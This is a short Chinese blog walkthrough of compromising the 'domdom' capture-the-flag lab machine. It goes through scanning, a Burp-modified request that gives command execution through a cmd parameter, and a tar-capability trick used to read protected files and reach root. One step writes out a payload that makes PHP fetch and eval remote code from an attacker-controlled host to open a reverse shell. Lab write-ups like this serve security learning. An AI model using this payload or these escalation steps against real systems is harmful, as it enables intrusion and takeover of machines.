0
点赞
收藏
分享

微信扫一扫

靶机渗透日记 domdom

老牛走世界 2022-02-08 阅读 50
  1. ip

    在这里插入图片描述

  2. 端口

    在这里插入图片描述

  3. 访问80端口

    在这里插入图片描述

  4. 目录扫描

    在这里插入图片描述

  5. 访问 /admin.php

    在这里插入图片描述

  6. 使用 burp 抓包
    在这里插入图片描述

    将 index.php 修改成 admin.php

    在这里插入图片描述

    添加 cmd 参数,结果返回响应的信息

    在这里插入图片描述

  7. 反弹shell

    name=123&username=123&password=123&access=access&cmd=php -d allow_url_fopen=true -r "eval(file_get_contents('http://192.168.154.128:8080/6a3fvwaVo', false, stream_context_create(['ssl'=>['verify_peer'=>false,'verify_peer_name'=>false]])));"
    

    在这里插入图片描述

  8. 在 /home/domom/Desktop 目录下存在 README.md ,但是没有权限
    在这里插入图片描述

  9. 搜索 capabilities

    getcap -r / 2>/dev/null 
    

    在这里插入图片描述

    使用 tar 将 README.md 打包并读取

    tar -cvf readme.tar /home/domom/Desktop/README.md
    cat readme.tar
    

    在这里插入图片描述

    直接切换到 root 用户

    在这里插入图片描述

举报

相关推荐

0 条评论